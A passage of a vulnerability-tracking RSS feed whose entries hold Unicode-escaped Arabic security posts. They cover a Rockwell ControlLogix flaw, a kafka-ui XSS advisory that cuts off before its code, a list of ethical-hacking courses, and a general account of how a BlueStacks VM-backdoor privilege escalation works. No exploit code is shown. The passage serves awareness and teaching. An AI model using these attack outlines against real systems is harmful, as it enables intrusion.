\u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0644\u0632\u064a\u0627\u062f\u0629 \u0635\u0644\u0627\u062d\u064a\u0627\u062a\u0647\u0645 \u0639\u0644\u0649 
\u0627\u0644\u0646\u0638\u0627\u0645. \u0645\u0646 \u0627\u0644\u0645\u0647\u0645 \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645 \u0628\u0627\u0646\u062a\u0638\u0627\u0645 \u0648\u0627\u0644\u062d\u0630\u0631 \u0639\u0646\u062f \u062a\u0646\u0632\u064a\u0644 \u0627\u0644\u0628\u0631\u0627\u0645\u062c \u0644\u062d\u0645\u0627\u064a\u0629 \u0646\u0641\u0633\u0643 \u0645\u0646 \u0647\u0630\u0647 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n\nALSED404:\n\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u0639\u0627\u0644\u064a\u0629 \u0627\u0644\u062e\u0637\u0648\u0631\u0629 (CVE-2024-6242) \u0641\u064a \u0623\u062c\u0647\u0632\u0629 Rockwell Automation ControlLogix 1756.\n\n\u0642\u062f \u064a\u0624\u062f\u064a \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0625\u0644\u0649 \u0625\u0635\u062f\u0627\u0631 \u0623\u0648\u0627\u0645\u0631 CIP \u063a\u064a\u0631 \u0645\u0635\u0631\u062d \u0628\u0647\u0627\u060c \u0645\u0645\u0627 \u064a\u0624\u062b\u0631 \u0639\u0644\u0649 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0627\u0644\u062c\u0647\u0627\u0632 \u0648\u0645\u0634\u0627\u0631\u064a\u0639 \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645.\n\u0627\u0642\u0631\u0623: https://thehackernews.com/2024/08/critical-flaw-in-rockwell-automation.html\n\nThe Smart Shadow:\n\u0646\u0638\u0631\u0629 \u0639\u0627\u0645\u0629 \u0639\u0644\u0649 \u0627\u0644\u062a\u0642\u0631\u064a\u0631\n\u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u0627\u0644\u0630\u064a \u0623\u0634\u0631\u062a \u0625\u0644\u064a\u0647 \u064a\u062a\u062d\u062f\u062b \u0639\u0646 \u062b\u063a\u0631\u0627\u062a \u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642 kafka-ui\u060c \u0648\u0647\u064a \u0648\u0627\u062c\u0647\u0629 \u0645\u0633\u062a\u062e\u062f\u0645 \u0644\u0625\u062f\u0627\u0631\u0629 Apache 
Kafka. \u0627\u0644\u062a\u0642\u0631\u064a\u0631 \u064a\u0648\u0636\u062d \u0646\u0648\u0639\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a:\n\n1. GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS (Cross-Site Scripting)\n2. GHSL-2023-230: \u062b\u063a\u0631\u0629 \u0623\u062e\u0631\u0649 \u0644\u0645 \u064a\u062a\u0645 \u062a\u062d\u062f\u064a\u062f \u0646\u0648\u0639\u0647\u0627 \u0628\u0634\u0643\u0644 \u0648\u0627\u0636\u062d \u0641\u064a \u0627\u0644\u0639\u0646\u0648\u0627\u0646\n\n### GHSL-2023-229: \u062b\u063a\u0631\u0629 XSS\n\u062b\u063a\u0631\u0629 XSS \u062a\u062d\u062f\u062b \u0639\u0646\u062f\u0645\u0627 \u064a\u062a\u0645\u0643\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0645\u0646 \u062d\u0642\u0646 \u0634\u064a\u0641\u0631\u0629 JavaScript \u0636\u0627\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 \u0648\u064a\u0628\u060c \u0648\u0627\u0644\u062a\u064a \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630\u0647\u0627 \u0641\u064a \u0645\u062a\u0635\u0641\u062d \u0627\u0644\u0636\u062d\u064a\u0629.\n\n#### \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0636\u0639\u064a\u0641\u0629 (Vulnerable method):\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0644\u062f\u064a\u0646\u0627 \u0637\u0631\u064a\u0642\u0629 \u0641\u064a \u0627\u0644\u0643\u0648\u062f \u062a\u0639\u0631\u0636 \u0645\u062f\u062e\u0644\u0627\u062a \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645 \u0645\u0628\u0627\u0634\u0631\u0629 \u0641\u064a \u0635\u0641\u062d\u0629 HTML \u062f\u0648\u0646 \u062a\u0646\u0642\u064a\u0629:", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/51ca8f8b-aeb4-43c0-b549-e8a1f5fad200/export</guid>
      <pubDate>Fri, 13 Dec 2024 19:00:22 +0000</pubDate>
    </item>
    <item>
      <title>8454b4dd-4ecc-4d1a-8559-383b31fe5e09</title>
      <link>https://vulnerability.circl.lu/sighting/8454b4dd-4ecc-4d1a-8559-383b31fe5e09/export</link>
      <description>{"uuid": "8454b4dd-4ecc-4d1a-8559-383b31fe5e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1612", "content": "2. \u062f\u0648\u0631\u0629 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642:\n   - \u0645\u0646\u0635\u0629: \u0631\u0648\u0627\u0642\n   - \u062a\u062a\u0636\u0645\u0646 \u0627\u0644\u062f\u0648\u0631\u0629 \u0634\u0631\u062d\u0627\u064b \u0644\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639\u0647\u0627.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.rwaq.org/courses/information-security-and-penetration-testing)\n\n3. \u062f\u0648\u0631\u0629 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0645\u0646 \u0627\u0644\u0635\u0641\u0631 \u0625\u0644\u0649 \u0627\u0644\u0627\u062d\u062a\u0631\u0627\u0641:\n   - \u0645\u0646\u0635\u0629: Udemy\n   - \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/ethical-hacking-arabic/)\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0625\u0646\u062c\u0644\u064a\u0632\u064a\u0629:\n\n1. 
Web Application Security Testing with OWASP ZAP:\n   - \u0645\u0646\u0635\u0629: Coursera\n   - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0627\u0629 OWASP ZAP.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.coursera.org/learn/web-application-security-testing-owasp-zap)\n\n2. Ethical Hacking: System Hacking:\n   - \u0645\u0646\u0635\u0629: LinkedIn Learning\n   - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0628\u0634\u0643\u0644 \u0622\u0645\u0646.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.linkedin.com/learning/ethical-hacking-system-hacking)\n\n3. Penetration Testing and Ethical Hacking:\n   - \u0645\u0646\u0635\u0629: Pluralsight\n   - \u062f\u0648\u0631\u0629 \u0634\u0627\u0645\u0644\u0629 \u062a\u063a\u0637\u064a \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.pluralsight.com/courses/penetration-testing-ethical-hacking)\n\n4. 
Web Application Security for Absolute Beginners:\n   - \u0645\u0646\u0635\u0629: Udemy\n   - \u062f\u0648\u0631\u0629 \u0645\u0648\u062c\u0647\u0629 \u0644\u0644\u0645\u0628\u062a\u062f\u0626\u064a\u0646 \u062a\u062a\u0646\u0627\u0648\u0644 \u0623\u0633\u0627\u0633\u064a\u0627\u062a \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u0643\u064a\u0641\u064a\u0629 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/web-application-security-for-absolute-beginners/)\n\n### \u0645\u0635\u0627\u062f\u0631 \u0625\u0636\u0627\u0641\u064a\u0629:\n\n- OWASP (Open Web Application Security Project):\n  - \u0645\u0634\u0631\u0648\u0639 \u0645\u0641\u062a\u0648\u062d \u0627\u0644\u0645\u0635\u062f\u0631 \u064a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u062d\u0633\u064a\u0646 \u0623\u0645\u0627\u0646 \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0627\u062a. 
\u064a\u0648\u0641\u0631 \u0642\u0648\u0627\u0626\u0645 \u0648\u062b\u0627\u0626\u0642\u064a\u0629 \u0648\u0623\u062f\u0648\u0627\u062a \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://owasp.org/)\n\n- Hack The Box:\n  - \u0645\u0646\u0635\u0629 \u062a\u0641\u0627\u0639\u0644\u064a\u0629 \u062a\u0648\u0641\u0631 \u0628\u064a\u0626\u0629 \u0644\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0641\u064a \u0623\u0646\u0638\u0645\u0629 \u062d\u0642\u064a\u0642\u064a\u0629.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](https://www.hackthebox.com/)\n\n- SecurityTube:\n  - \u0645\u0643\u062a\u0628\u0629 \u0641\u064a\u062f\u064a\u0648\u0647\u0627\u062a \u062a\u0639\u0644\u064a\u0645\u064a\u0629 \u062a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0639\u062f\u064a\u062f \u0645\u0646 \u0627\u0644\u062f\u0631\u0648\u0633 \u0648\u0627\u0644\u0645\u062d\u0627\u0636\u0631\u0627\u062a \u062d\u0648\u0644 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0645\u0648\u0642\u0639](http://www.securitytube.net/)\n\n- \u0643\u062a\u0627\u0628 \"The Web Application Hacker's Handbook\":\n  - \u0643\u062a\u0627\u0628 \u0645\u0645\u064a\u0632 \u064a\u062a\u0646\u0627\u0648\u0644 \u0628\u0627\u0644\u062a\u0641\u0635\u064a\u0644 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u062a\u0637\u0628\u064a\u0642\u0627\u062a 
\u0627\u0644\u0648\u064a\u0628 \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0627.\n  - [\u0631\u0627\u0628\u0637 \u0627\u0644\u0643\u062a\u0627\u0628 \u0639\u0644\u0649 \u0623\u0645\u0627\u0632\u0648\u0646](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470)\n\nThe Smart Shadow:\n\u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a BlueStacks (\u0645\u062d\u0627\u0643\u064a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f) \u0648\u0627\u0644\u062a\u064a \u062a\u0639\u062a\u0645\u062f \u0639\u0644\u0649 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (CVE-2024-33352) \n\n---\n\n\u0634\u0631\u062d \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0641\u064a BlueStacks\n\n\u0645\u0642\u062f\u0645\u0629:\nBlueStacks \u0647\u0648 \u0645\u062d\u0627\u0643\u064a \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u064a\u0633\u062a\u062e\u062f\u0645 \u0644\u062a\u0634\u063a\u064a\u0644 \u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u0623\u062c\u0647\u0632\u0629 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. 
\u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062e\u0637\u064a\u0631\u0629 \u0641\u064a \u0647\u0630\u0627 \u0627\u0644\u0645\u062d\u0627\u0643\u064a \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u0639\u0628\u0631 \u0627\u0644\u062a\u0633\u0644\u0644 \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n\n\u0645\u0627 \u0647\u064a \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352\u061f\n\nCVE-2024-33352 \u0647\u064a \u062b\u063a\u0631\u0629 \u0623\u0645\u0646\u064a\u0629 \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\u0627 \u0641\u064a BlueStacks\u060c \u062a\u062a\u064a\u062d \u0644\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation) \u0645\u0646 \u062e\u0644\u0627\u0644 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring). 
\u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u0645\u0627 \u0647\u0648 \u0645\u0633\u0645\u0648\u062d \u0644\u0647\u060c \u0645\u0645\u0627 \u064a\u0645\u0643\u0646\u0647 \u0645\u0646 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0628\u064a\u0627\u0646\u0627\u062a \u062d\u0633\u0627\u0633\u0629.\n\n\u0643\u064a\u0641 \u062a\u0639\u0645\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629\u061f\n\n1. \u0627\u0644\u0628\u0627\u0628 \u0627\u0644\u062e\u0644\u0641\u064a \u0644\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 (VM backdooring):\n   - \u062a\u0633\u062a\u062e\u062f\u0645 BlueStacks \u062a\u0642\u0646\u064a\u0629 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u062a\u0634\u063a\u064a\u0644 \u0646\u0638\u0627\u0645 \u0627\u0644\u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0639\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631. \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0647\u0630\u0647 \u0627\u0644\u0628\u064a\u0626\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 (malicious code) \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.\n   \n2. 
\u062a\u0635\u0639\u064a\u062f \u0627\u0644\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a (Privilege Escalation):\n   - \u0628\u0639\u062f \u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631\u060c \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u062a\u0635\u0639\u064a\u062f \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\u0647 \u062f\u0627\u062e\u0644 \u0627\u0644\u0646\u0638\u0627\u0645. \u0647\u0630\u0627 \u064a\u0639\u0646\u064a \u0623\u0646\u0647 \u064a\u0645\u0643\u0646\u0647 \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0623\u0639\u0644\u0649 \u0645\u062b\u0644 \u0635\u0644\u0627\u062d\u064a\u0627\u062a \u0627\u0644\u0645\u062f\u064a\u0631 (Administrator privileges)\u060c \u0645\u0645\u0627 \u064a\u062a\u064a\u062d \u0644\u0647 \u062a\u0646\u0641\u064a\u0630 \u0623\u0648\u0627\u0645\u0631 \u0636\u0627\u0631\u0629 \u0623\u0648 \u0627\u0644\u0648\u0635\u0648\u0644 \u0625\u0644\u0649 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645 \u0627\u0644\u062d\u0633\u0627\u0633\u0629.\n\n\u0645\u062b\u0627\u0644 \u0639\u0645\u0644\u064a:\n\n\u0644\u0646\u0641\u062a\u0631\u0636 \u0623\u0646 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0644\u062f\u064a\u0647 \u0648\u0635\u0648\u0644 \u0645\u062d\u062f\u0648\u062f \u0625\u0644\u0649 \u062c\u0647\u0627\u0632 \u0627\u0644\u0643\u0645\u0628\u064a\u0648\u062a\u0631 \u0627\u0644\u0630\u064a \u064a\u0639\u0645\u0644 \u0639\u0644\u064a\u0647 BlueStacks. \u064a\u0645\u0643\u0646\u0647 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0627\u0644\u0623\u0645\u0646\u064a\u0629 CVE-2024-33352 \u0628\u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u062a\u0627\u0644\u064a\u0629:\n\n1. 
\u0625\u062f\u062e\u0627\u0644 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n   - \u064a\u0642\u0648\u0645 \u0627\u0644\u0645\u0647\u0627\u062c\u0645 \u0628\u0625\u062f\u062e\u0627\u0644 \u0643\u0648\u062f \u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 \u0644\u0640 BlueStacks. \u064a\u0645\u0643\u0646 \u0623\u0646 \u064a\u062d\u062f\u062b \u0630\u0644\u0643 \u0645\u0646 \u062e\u0644\u0627\u0644 \u062a\u0646\u0632\u064a\u0644 \u062a\u0637\u0628\u064a\u0642 \u0623\u0646\u062f\u0631\u0648\u064a\u062f \u0636\u0627\u0631 \u064a\u062d\u062a\u0648\u064a \u0639\u0644\u0649 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u062e\u0628\u064a\u062b.\n\n2. \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631:\n   - \u0639\u0646\u062f \u062a\u0634\u063a\u064a\u0644 \u0627\u0644\u062a\u0637\u0628\u064a\u0642 \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 BlueStacks\u060c \u064a\u062a\u0645 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0643\u0648\u062f \u0627\u0644\u0636\u0627\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0622\u0644\u0629 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629.", "creation_timestamp": "2024-12-13T19:00:22.000000Z"}</description>
      <content:encoded>{"uuid": "8454b4dd-4ecc-4d1a-8559-383b31fe5e09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-33352", "type": "published-proof-of-concept", "source": "https://t.me/cyber_hsecurity/1612", "content": "2. \u062f\u0648\u0631\u0629 \u0623\u0645\u0646 \u0627\u0644\u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0648\u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642:\n   - \u0645\u0646\u0635\u0629: \u0631\u0648\u0627\u0642\n   - \u062a\u062a\u0636\u0645\u0646 \u0627\u0644\u062f\u0648\u0631\u0629 \u0634\u0631\u062d\u0627\u064b \u0644\u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0648\u0627\u0644\u062a\u0639\u0627\u0645\u0644 \u0645\u0639\u0647\u0627.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.rwaq.org/courses/information-security-and-penetration-testing)\n\n3. 
\u062f\u0648\u0631\u0629 \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0645\u0646 \u0627\u0644\u0635\u0641\u0631 \u0625\u0644\u0649 \u0627\u0644\u0627\u062d\u062a\u0631\u0627\u0641:\n   - \u0645\u0646\u0635\u0629: Udemy\n   - \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0643\u064a\u0641\u064a\u0629 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0623\u062f\u0648\u0627\u062a \u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/ethical-hacking-arabic/)\n\n### \u062f\u0648\u0631\u0627\u062a \u0628\u0627\u0644\u0644\u063a\u0629 \u0627\u0644\u0625\u0646\u062c\u0644\u064a\u0632\u064a\u0629:\n\n1. Web Application Security Testing with OWASP ZAP:\n   - \u0645\u0646\u0635\u0629: Coursera\n   - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u062e\u062a\u0628\u0627\u0631 \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0623\u062f\u0627\u0629 OWASP ZAP.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.coursera.org/learn/web-application-security-testing-owasp-zap)\n\n2. 
Ethical Hacking: System Hacking:\n   - \u0645\u0646\u0635\u0629: LinkedIn Learning\n   - \u062a\u0639\u0644\u0645 \u0643\u064a\u0641\u064a\u0629 \u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0641\u064a \u0627\u0644\u0623\u0646\u0638\u0645\u0629 \u0648\u0627\u0633\u062a\u062e\u062f\u0627\u0645\u0647\u0627 \u0628\u0634\u0643\u0644 \u0622\u0645\u0646.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.linkedin.com/learning/ethical-hacking-system-hacking)\n\n3. Penetration Testing and Ethical Hacking:\n   - \u0645\u0646\u0635\u0629: Pluralsight\n   - \u062f\u0648\u0631\u0629 \u0634\u0627\u0645\u0644\u0629 \u062a\u063a\u0637\u064a \u062a\u0642\u0646\u064a\u0627\u062a \u0627\u0644\u0627\u062e\u062a\u0631\u0627\u0642 \u0627\u0644\u0623\u062e\u0644\u0627\u0642\u064a \u0648\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.pluralsight.com/courses/penetration-testing-ethical-hacking)\n\n4. 
Web Application Security for Absolute Beginners:\n   - \u0645\u0646\u0635\u0629: Udemy\n   - \u062f\u0648\u0631\u0629 \u0645\u0648\u062c\u0647\u0629 \u0644\u0644\u0645\u0628\u062a\u062f\u0626\u064a\u0646 \u062a\u062a\u0646\u0627\u0648\u0644 \u0623\u0633\u0627\u0633\u064a\u0627\u062a \u0623\u0645\u0646 \u0627\u0644\u062a\u0637\u0628\u064a\u0642\u0627\u062a \u0648\u0643\u064a\u0641\u064a\u0629 \u062d\u0645\u0627\u064a\u0629 \u0627\u0644\u0645\u0648\u0627\u0642\u0639 \u0645\u0646 \u0627\u0644\u0647\u062c\u0645\u0627\u062a.\n   - [\u0631\u0627\u0628\u0637 \u0627\u0644\u062f\u0648\u0631\u0629](https://www.udemy.com/course/web-application-security-for-absolute-beginners/)\n\n### \u0645\u0635\u0627\u062f\u0631 \u0625\u0636\u0627\u0641\u064a\u0629:\n\n- OWASP (Open Web Application Security Project):\n  - \u0645\u0634\u0631\u0648\u0639 \u0645\u0641\u062a\u0648\u062d \u0627\u0644\u0645\u0635\u062f\u0631 \u064a\u0631\u0643\u0632 \u0639\u0644\u0649 \u062a\u062d\u0633\u064a\u0646 